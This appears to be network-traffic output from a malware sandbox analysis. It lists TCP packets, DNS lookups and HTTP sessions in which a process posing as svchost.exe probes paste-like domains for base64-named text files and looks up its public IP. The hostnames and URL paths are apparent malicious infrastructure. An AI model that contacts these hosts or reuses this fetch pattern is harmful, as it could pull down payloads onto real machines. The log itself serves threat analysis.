                                                              Jan 12, 2025 09:27:50.246520042 CET5058280192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:50.250744104 CET8050580172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:50.251588106 CET8050582172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:51.376810074 CET50583443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.376914978 CET44350583172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.377085924 CET50583443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.377168894 CET50583443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.377280951 CET44350583172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.377343893 CET50583443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.377435923 CET50584443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.377475977 CET44350584172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.377533913 CET50584443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.377563000 CET50584443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.377598047 CET44350584172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.377644062 CET50584443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.378176928 CET5058580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.378504992 CET5058680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.383151054 CET8050585172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.383232117 CET5058580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.383268118 CET5058580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.383270979 CET8050586172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.383335114 CET5058680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.383347988 CET5058680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.388071060 CET8050585172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.388134956 CET8050586172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.829025984 CET8050586172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.829320908 CET5058680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.829693079 CET8050586172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.829750061 CET5058680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.834160089 CET8050586172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.840322018 CET8050585172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.840456009 CET5058580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.841306925 CET8050585172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:51.841366053 CET5058580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:51.845293999 CET8050585172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:56.957525969 CET50587443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.957633018 CET44350587104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.957732916 CET50587443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.957892895 CET50587443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.957962036 CET44350587104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.958025932 CET50587443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.959492922 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.963485003 CET50589443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.963531017 CET44350589104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.963593960 CET50589443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.963627100 CET50589443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.963668108 CET44350589104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.963715076 CET50589443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.964608908 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.964663029 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.965092897 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.965133905 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.969999075 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.970050097 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.970114946 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.970424891 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.975215912 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.421802044 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.421912909 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:57.422194004 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.422243118 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:57.426757097 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.432512045 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.432605028 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:57.432635069 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.432679892 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:57.437438011 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:15.954606056 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:15.954663992 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:15.954746962 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:17.736654997 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:17.736716032 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:17.736826897 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:17.738240004 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:17.738255024 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:18.198559046 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:18.198699951 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.398902893 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.399028063 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.399288893 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.399394989 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.399394989 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.399574041 CET50598443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.399621964 CET44350598188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.399852037 CET50598443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.399852037 CET50598443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.399935007 CET44350598188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.399993896 CET50598443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.400214911 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.400629044 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.400650978 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.405117035 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.407871962 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.407896042 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.412688971 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.928720951 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.928970098 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.931675911 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.931796074 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.932307005 CET50600443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.932378054 CET44350600172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:24.932466030 CET50600443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.932507038 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.932540894 CET50600443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.932564974 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.932693005 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.932719946 CET44350600172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:24.935857058 CET50600443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.936732054 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.937508106 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:24.937580109 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.937604904 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.942460060 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:24.955724001 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.955815077 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.956059933 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.956111908 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.956131935 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.956216097 CET50602443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.956271887 CET44350602188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.956341982 CET50602443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.956532955 CET50602443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.956561089 CET44350602188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.956614017 CET50602443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.956837893 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.961608887 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.961684942 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.961721897 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.966490030 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:25.419701099 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.419900894 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.419909954 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.420037985 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.421255112 CET50604443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.421351910 CET44350604172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.421502113 CET50604443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.421503067 CET50604443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.421878099 CET44350604172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.421974897 CET50604443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.423352003 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.424736977 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.428142071 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.428232908 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.428232908 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.432971954 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.443326950 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:25.443428993 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:25.443896055 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:25.443969011 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:25.444525957 CET50606443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.444561005 CET44350606172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.444655895 CET50606443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.444770098 CET50606443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.444807053 CET44350606172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.444883108 CET50606443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.445579052 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.448159933 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:25.450335979 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.450438976 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.450524092 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.455329895 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.890772104 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.891220093 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.891336918 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.891336918 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.891592979 CET50608443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.891629934 CET44350608104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:25.891700983 CET50608443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.891729116 CET50608443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.891823053 CET44350608104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:25.891875029 CET50608443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.892091990 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.896137953 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.896980047 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:25.897046089 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.897080898 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.901854038 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:25.912910938 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.913007021 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.913372040 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.913414955 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.913518906 CET50610443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.913564920 CET44350610172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.913621902 CET50610443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.913649082 CET50610443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.913685083 CET44350610172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.913727999 CET50610443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.913919926 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.917807102 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.918700933 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.918754101 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.918788910 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.923554897 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:26.367130995 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.367324114 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.367917061 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.369209051 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.369240999 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.369273901 CET44350614104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.369364023 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.369751930 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.369766951 CET44350614104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.372147083 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.372582912 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:26.372680902 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:26.372838020 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:26.372885942 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:26.373241901 CET50615443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.373269081 CET44350615104.21.64.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2025 09:26:19.258945942 CET | 192.168.2.7 | 1.1.1.1 | 0xb320 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:19.278812885 CET | 192.168.2.7 | 1.1.1.1 | 0xdeb | Standard query (0) | pastesnap.com | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:19.337776899 CET | 192.168.2.7 | 1.1.1.1 | 0x313 | Standard query (0) | pastesnap.com | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:42.051440001 CET | 192.168.2.7 | 1.1.1.1 | 0x6c3b | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:42.818308115 CET | 192.168.2.7 | 1.1.1.1 | 0xb5a7 | Standard query (0) | wavepassage.cfd | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:43.818075895 CET | 192.168.2.7 | 1.1.1.1 | 0xcfd8 | Standard query (0) | textbinvault.com | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:44.342900991 CET | 192.168.2.7 | 1.1.1.1 | 0xa834 | Standard query (0) | securetextweb.cc | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2025 09:26:19.265641928 CET | 1.1.1.1 | 192.168.2.7 | 0xb320 | No error (0) | www.google.com | | 142.250.181.228 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:19.292085886 CET | 1.1.1.1 | 192.168.2.7 | 0xdeb | No error (0) | pastesnap.com | | 172.67.198.113 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:19.292085886 CET | 1.1.1.1 | 192.168.2.7 | 0xdeb | No error (0) | pastesnap.com | | 104.21.60.172 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:19.351217031 CET | 1.1.1.1 | 192.168.2.7 | 0x313 | No error (0) | pastesnap.com | | 104.21.60.172 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:19.351217031 CET | 1.1.1.1 | 192.168.2.7 | 0x313 | No error (0) | pastesnap.com | | 172.67.198.113 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:42.058024883 CET | 1.1.1.1 | 192.168.2.7 | 0x6c3b | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:42.058024883 CET | 1.1.1.1 | 192.168.2.7 | 0x6c3b | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:42.058024883 CET | 1.1.1.1 | 192.168.2.7 | 0x6c3b | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:42.830581903 CET | 1.1.1.1 | 192.168.2.7 | 0xb5a7 | No error (0) | wavepassage.cfd | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:42.830581903 CET | 1.1.1.1 | 192.168.2.7 | 0xb5a7 | No error (0) | wavepassage.cfd | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:43.857870102 CET | 1.1.1.1 | 192.168.2.7 | 0xcfd8 | No error (0) | textbinvault.com | | 172.67.176.186 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:43.857870102 CET | 1.1.1.1 | 192.168.2.7 | 0xcfd8 | No error (0) | textbinvault.com | | 104.21.17.117 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:44.354959011 CET | 1.1.1.1 | 192.168.2.7 | 0xa834 | No error (0) | securetextweb.cc | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:44.354959011 CET | 1.1.1.1 | 192.168.2.7 | 0xa834 | No error (0) | securetextweb.cc | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:44.354959011 CET | 1.1.1.1 | 192.168.2.7 | 0xa834 | No error (0) | securetextweb.cc | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:44.354959011 CET | 1.1.1.1 | 192.168.2.7 | 0xa834 | No error (0) | securetextweb.cc | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:44.354959011 CET | 1.1.1.1 | 192.168.2.7 | 0xa834 | No error (0) | securetextweb.cc | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:44.354959011 CET | 1.1.1.1 | 192.168.2.7 | 0xa834 | No error (0) | securetextweb.cc | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 09:26:44.354959011 CET | 1.1.1.1 | 192.168.2.7 | 0xa834 | No error (0) | securetextweb.cc | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
                                                              • pastesnap.com
                                                              • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49857 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2025 09:26:42.837050915 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
Jan 12, 2025 09:26:43.320178032 CET | 879 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:43 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVNZ4FbFysVM%2BQutercdvETi8sm4Tj8TuJN7dNnaeThGNrT2ejrhsiDlSxdF6CrZjZMUJ8RY%2F0bQzwpayXfGd5XsxHZj%2FNBShFI1lb%2F8DpL8BTzDvLr6p%2FrRx%2BpPDkoAwkg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3646838428b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2153&min_rtt=2153&rtt_var=1076&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49862 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2025 09:26:43.327511072 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
Jan 12, 2025 09:26:43.815934896 CET | 868 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:43 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B9sn9J0HfiwxXoVW5w8jJC1Xbk8%2F5GZX13%2Bmx%2FggLnujvNFatfZ4Px0p%2Fg2l7BSL%2FgNEdFXFPYBe%2BUaeUYaba%2BHTPiwoXDrHh6brFfzo5epbLwcw2vqUaARGpJ7ebTAC"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3676e3232fc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1991&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49872 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2025 09:26:43.865554094 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
Jan 12, 2025 09:26:44.336540937 CET | 879 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:44 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxwFGpfyRlz%2FwSlFFwH%2F43kS6cxtjbE0Zye5cwc9PZFT9LpBxEf2Qy3m0VUwNSNkl717eJkAj%2BizxBPRMh7uf6Ao6lWFfmgJ8LnVkA8I4%2FQgjOxVwB%2BZfv5sK%2FzArkhVn%2F6K"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc36acdaede9a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49874 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2025 09:26:44.072865009 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
Jan 12, 2025 09:26:44.533900976 CET | 878 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:44 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bQXYaUbR9od1rkbmFK%2Fs5LbPNSPMVh0gLaMDsEioKxsNq8qkoK%2BzD9QvVrmIWt0q2YZD3lJLHYjmw%2FarYM2YVUNPw0bnPxVd2%2By0b%2B9%2B4DiWVxOQ7ED1GDtWRaLMyisv4ng%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc36bfd790f5b-EWR
